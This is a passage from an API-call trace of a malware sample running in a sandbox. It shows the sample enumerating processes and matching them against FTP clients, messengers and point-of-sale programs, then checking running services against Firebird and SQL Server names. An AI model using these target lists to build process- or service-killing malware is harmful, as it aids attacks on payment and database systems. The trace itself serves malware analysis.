th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0164.722] lstrlenW (lpString="scriptftp.exe") returned 13 [0164.722] Process32NextW (in: hSnapshot=0x2a0, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0164.723] lstrlenW (lpString="skype.exe") returned 9 [0164.723] Process32NextW (in: hSnapshot=0x2a0, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0164.723] lstrlenW (lpString="smartftp.exe") returned 12 [0164.723] Process32NextW (in: hSnapshot=0x2a0, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0164.724] lstrlenW (lpString="thunderbird.exe") returned 15 [0164.724] Process32NextW (in: hSnapshot=0x2a0, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="totalcmd.exe")) returned 1 [0164.725] lstrlenW (lpString="totalcmd.exe") returned 12 [0164.725] Process32NextW (in: hSnapshot=0x2a0, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0164.726] lstrlenW (lpString="trillian.exe") returned 12 [0164.726] Process32NextW (in: hSnapshot=0x2a0, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0164.727] lstrlenW (lpString="webdrive.exe") returned 12 [0164.727] Process32NextW (in: hSnapshot=0x2a0, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xff8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0164.750] lstrlenW (lpString="whatsapp.exe") returned 12 [0164.750] Process32NextW (in: hSnapshot=0x2a0, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xcd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0164.751] lstrlenW (lpString="winscp.exe") returned 10 [0164.751] Process32NextW (in: hSnapshot=0x2a0, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd08, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0164.752] lstrlenW (lpString="yahoomessenger.exe") returned 18 [0164.752] Process32NextW (in: hSnapshot=0x2a0, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0164.753] lstrlenW (lpString="active-charge.exe") returned 17 [0164.753] Process32NextW (in: hSnapshot=0x2a0, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xde0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0164.753] lstrlenW (lpString="accupos.exe") returned 11 [0164.754] Process32NextW (in: hSnapshot=0x2a0, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0164.754] lstrlenW (lpString="afr38.exe") returned 9 [0164.754] Process32NextW (in: hSnapshot=0x2a0, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0164.755] lstrlenW (lpString="aldelo.exe") returned 10 [0164.755] Process32NextW (in: hSnapshot=0x2a0, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0164.757] lstrlenW (lpString="ccv_server.exe") returned 14 [0164.757] Process32NextW (in: hSnapshot=0x2a0, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xba0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0164.758] lstrlenW (lpString="centralcreditcard.exe") returned 21 [0164.758] Process32NextW (in: hSnapshot=0x2a0, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xee8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0164.759] lstrlenW (lpString="creditservice.exe") returned 17 [0164.759] Process32NextW (in: hSnapshot=0x2a0, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0164.761] lstrlenW (lpString="edcsvr.exe") returned 10 [0164.761] Process32NextW (in: hSnapshot=0x2a0, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0164.762] lstrlenW (lpString="fpos.exe") returned 8 [0164.762] Process32NextW (in: hSnapshot=0x2a0, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0164.763] lstrlenW (lpString="isspos.exe") returned 10 [0164.763] Process32NextW (in: hSnapshot=0x2a0, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfe4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0164.764] lstrlenW (lpString="mxslipstream.exe") returned 16 [0164.764] Process32NextW (in: hSnapshot=0x2a0, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1010, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0164.765] lstrlenW (lpString="omnipos.exe") returned 11 [0164.765] Process32NextW (in: hSnapshot=0x2a0, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1024, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0164.766] lstrlenW (lpString="spcwin.exe") returned 10 [0164.766] Process32NextW (in: hSnapshot=0x2a0, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1038, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0164.767] lstrlenW (lpString="spgagentservice.exe") returned 19 [0164.767] Process32NextW (in: hSnapshot=0x2a0, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0164.768] lstrlenW (lpString="utg2.exe") returned 8 [0164.768] Process32NextW (in: hSnapshot=0x2a0, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1060, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="lb_community.exe")) returned 1 [0164.769] lstrlenW (lpString="lb_community.exe") returned 16 [0164.769] Process32NextW (in: hSnapshot=0x2a0, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1074, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="miniature.exe")) returned 1 [0164.770] lstrlenW (lpString="miniature.exe") returned 13 [0164.770] Process32NextW (in: hSnapshot=0x2a0, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1088, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="humanity-volumes-enables.exe")) returned 1 [0164.771] lstrlenW (lpString="humanity-volumes-enables.exe") returned 28 [0164.771] Process32NextW (in: hSnapshot=0x2a0, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x10a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="operation-environments.exe")) returned 1 [0164.772] lstrlenW (lpString="operation-environments.exe") returned 26 [0164.772] Process32NextW (in: hSnapshot=0x2a0, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0164.773] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0164.773] Process32NextW (in: hSnapshot=0x2a0, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x3ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0164.774] lstrlenW (lpString="taskhostw.exe") returned 13 [0164.774] Process32NextW (in: hSnapshot=0x2a0, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x12a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="UNPCampaignManager.exe")) returned 1 [0164.775] lstrlenW (lpString="UNPCampaignManager.exe") returned 22 [0164.775] Process32NextW (in: hSnapshot=0x2a0, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x12b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="DeviceCensus.exe")) returned 1 [0164.776] lstrlenW (lpString="DeviceCensus.exe") returned 16 [0164.776] Process32NextW (in: hSnapshot=0x2a0, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x12b0, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0164.777] lstrlenW (lpString="conhost.exe") returned 11 [0164.777] Process32NextW (in: hSnapshot=0x2a0, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x348, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0164.778] lstrlenW (lpString="sppsvc.exe") returned 10 [0164.778] Process32NextW (in: hSnapshot=0x2a0, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x10ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0164.779] lstrlenW (lpString="dllhost.exe") returned 11 [0164.779] Process32NextW (in: hSnapshot=0x2a0, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1260, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="wdgmug.exe")) returned 1 [0164.779] lstrlenW (lpString="wdgmug.exe") returned 10 [0164.779] Process32NextW (in: hSnapshot=0x2a0, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1160, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x1260, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0164.780] lstrlenW (lpString="cmd.exe") returned 7 [0164.780] Process32NextW (in: hSnapshot=0x2a0, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1140, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x1160, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0164.781] lstrlenW (lpString="conhost.exe") returned 11 [0164.781] Process32NextW (in: hSnapshot=0x2a0, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x764, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="sc.exe")) returned 1 [0164.782] lstrlenW (lpString="sc.exe") returned 6 [0164.782] Process32NextW (in: hSnapshot=0x2a0, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x764, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="sc.exe")) returned 0 [0164.783] CloseHandle (hObject=0x2a0) returned 1 [0164.783] Sleep (dwMilliseconds=0x1f4) [0167.025] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x74e8e0 [0167.027] EnumServicesStatusExW (in: hSCManager=0x74e8e0, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x24eff3c, lpServicesReturned=0x24eff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x24eff3c, lpServicesReturned=0x24eff54, lpResumeHandle=0x0) returned 0 [0167.027] GetLastError () returned 0xea [0167.028] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0x1dfc) returned 0x800060 [0167.028] EnumServicesStatusExW (in: hSCManager=0x74e8e0, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x800060, cbBufSize=0x1dfc, pcbBytesNeeded=0x24eff3c, lpServicesReturned=0x24eff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x800060, pcbBytesNeeded=0x24eff3c, lpServicesReturned=0x24eff54, lpResumeHandle=0x0) returned 1 [0167.029] CloseServiceHandle (hSCObject=0x74e8e0) returned 1 [0167.029] lstrlenW (lpString="Appinfo") returned 7 [0167.029] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1 [0167.029] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1 [0167.029] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1 [0167.029] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1 [0167.029] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1 [0167.029] lstrlenW (lpString="AppXSvc") returned 7 [0167.029] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AppXSvc") returned 1 [0167.029] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AppXSvc") returned 1 [0167.029] lstrcmpiW (lpString1="sqlwriter", lpString2="AppXSvc") returned 1 [0167.029] lstrcmpiW (lpString1="mssqlserver", lpString2="AppXSvc") returned 1 [0167.029] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AppXSvc") returned 1 [0167.029] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0167.029] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0167.029] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0167.029] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0167.029] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0167.030] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0167.030] lstrlenW (lpString="Audiosrv") returned 8 [0167.030] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Audiosrv") returned 1 [0167.030] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Audiosrv") returned 1 [0167.030] lstrcmpiW (lpString1="sqlwriter", lpString2="Audiosrv") returned 1 [0167.030] lstrcmpiW (lpString1="mssqlserver", lpString2="Audiosrv") returned 1 [0167.030] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Audiosrv") returned 1 [0167.030] lstrlenW (lpString="BFE") returned 3 [0167.030] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0167.030] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0167.030] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0167.030] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0167.030] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0167.030] lstrlenW (lpString="BITS") returned 4 [0167.030] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BITS") returned 1 [0167.030] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BITS") returned 1 [0167.030] lstrcmpiW (lpString1="sqlwriter", lpString2="BITS") returned 1 [0167.030] lstrcmpiW (lpString1="mssqlserver", lpString2="BITS") returned 1 [0167.030] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BITS") returned 1 [0167.030] lstrlenW (lpString="BrokerInfrastructure") returned 20 [0167.030] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0167.030] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0167.030] lstrcmpiW (lpString1="sqlwriter", lpString2="BrokerInfrastructure") returned 1 [0167.030] lstrcmpiW (lpString1="mssqlserver", lpString2="BrokerInfrastructure") returned 1 [0167.030] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BrokerInfrastructure") returned 1 [0167.030] lstrlenW (lpString="CDPSvc") returned 6 [0167.030] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CDPSvc") returned 1 [0167.031] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CDPSvc") returned 1 [0167.031] lstrcmpiW (lpString1="sqlwriter", lpString2="CDPSvc") returned 1 [0167.031] lstrcmpiW (lpString1="mssqlserver", lpString2="CDPSvc") returned 1 [0167.031] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CDPSvc") returned 1 [0167.031] lstrlenW (lpString="ClickToRunSvc") returned 13 [0167.031] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0167.031] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0167.031] lstrcmpiW (lpString1="sqlwriter", lpString2="ClickToRunSvc") returned 1 [0167.031] lstrcmpiW (lpString1="mssqlserver", lpString2="ClickToRunSvc") returned 1 [0167.031] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ClickToRunSvc") returned 1 [0167.031] lstrlenW (lpString="CoreMessagingRegistrar") returned 22 [0167.031] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0167.031] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0167.031] lstrcmpiW (lpString1="sqlwriter", lpString2="CoreMessagingRegistrar") returned 1 [0167.031] lstrcmpiW (lpString1="mssqlserver", lpString2="CoreMessagingRegistrar") returned 1 [0167.031] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CoreMessagingRegistrar") returned 1 [0167.031] lstrlenW (lpString="CryptSvc") returned 8 [0167.031] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0167.031] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0167.031] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0167.031] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0167.031] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0167.031] lstrlenW (lpString="DcomLaunch") returned 10 [0167.031] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0167.031] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0167.032] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0167.032] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0167.032] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0167.032] lstrlenW (lpString="Dhcp") returned 4 [0167.032] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0167.032] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0167.032] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0167.032] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0167.032] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0167.032] lstrlenW (lpString="Dnscache") returned 8 [0167.032] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0167.032] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0167.032] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0167.032] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0167.033] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0167.033] lstrlenW (lpString="DoSvc") returned 5 [0167.033] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DoSvc") returned 1 [0167.033] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DoSvc") returned 1 [0167.033] lstrcmpiW (lpString1="sqlwriter", lpString2="DoSvc") returned 1 [0167.033] lstrcmpiW (lpString1="mssqlserver", lpString2="DoSvc") returned 1 [0167.033] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DoSvc") returned 1 [0167.033] lstrlenW (lpString="DPS") returned 3 [0167.033] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0167.033] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0167.033] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0167.033] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0167.033] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0167.033] lstrlenW (lpString="DusmSvc") returned 7 [0167.033] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DusmSvc") returned 1 [0167.033] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DusmSvc") returned 1 [0167.033] lstrcmpiW (lpString1="sqlwriter", lpString2="DusmSvc") returned 1 [0167.033] lstrcmpiW (lpString1="mssqlserver", lpString2="DusmSvc") returned 1 [0167.033] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DusmSvc") returned 1 [0167.033] lstrlenW (lpString="EventLog") returned 8 [0167.033] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventLog") returned 1 [0167.033] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventLog") returned 1 [0167.033] lstrcmpiW (lpString1="sqlwriter", lpString2="EventLog") returned 1 [0167.033] lstrcmpiW (lpString1="mssqlserver", lpString2="EventLog") returned 1 [0167.033] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventLog") returned 1 [0167.033] lstrlenW (lpString="EventSystem") returned 11 [0167.033] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0167.034] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0167.034] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0167.034] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0167.034] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0167.034] lstrlenW (lpString="FontCache") returned 9 [0167.034] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="FontCache") returned -1 [0167.034] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="FontCache") returned -1 [0167.034] lstrcmpiW (lpString1="sqlwriter", lpString2="FontCache") returned 1 [0167.034] lstrcmpiW (lpString1="mssqlserver", lpString2="FontCache") returned 1 [0167.034] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="FontCache") returned 1 [0167.034] lstrlenW (lpString="gpsvc") returned 5 [0167.034] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0167.034] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0167.034] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0167.034] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0167.034] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0167.034] lstrlenW (lpString="iphlpsvc") returned 8 [0167.034] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0167.034] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0167.034] 